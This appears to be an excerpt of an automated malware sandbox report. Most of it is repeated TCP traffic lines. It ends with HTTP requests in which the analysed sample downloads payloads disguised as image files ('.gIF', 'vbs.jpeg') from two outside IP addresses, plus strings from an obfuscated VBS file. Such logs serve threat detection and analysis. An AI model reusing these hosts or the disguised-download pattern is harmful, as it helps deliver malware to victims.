    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 172.245.123.11:80 -> 192.168.2.22:49161
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: global trafficTCP traffic: 192.168.2.22:49161 -> 172.245.123.11:80
    Source: seethemoononlinetoseebeautygirl[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
    Source: seethemoononlinetoseebeautygirl[1].gif.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
    Source: seethemoononlinetoseebeautygir.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport><force/></analyze_input> - obfuscation quality: 4
    Source: seethemoononlinetoseebeautygir.vBS.2.drBinary string: http://schemas.microsoft.com/wbem/wsman/1/config/service><transport>transport</transport></analyze_input> - obfuscation quality: 4
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: global trafficHTTP traffic detected: GET /Upload/vbs.jpeg HTTP/1.1Host: 198.46.176.133Connection: Keep-Alive
    Source: Joe Sandbox ViewIP Address: 198.46.176.133 198.46.176.133
    Source: Joe Sandbox ViewASN Name: AS-COLOCROSSINGUS AS-COLOCROSSINGUS
    Source: global trafficHTTP traffic detected: GET /46/seethemoononlinetoseebeautygirl.gIF HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 172.245.123.11Connection: Keep-Alive
    Source: unknownTCP traffic detected without corresponding DNS query: 172.245.123.11
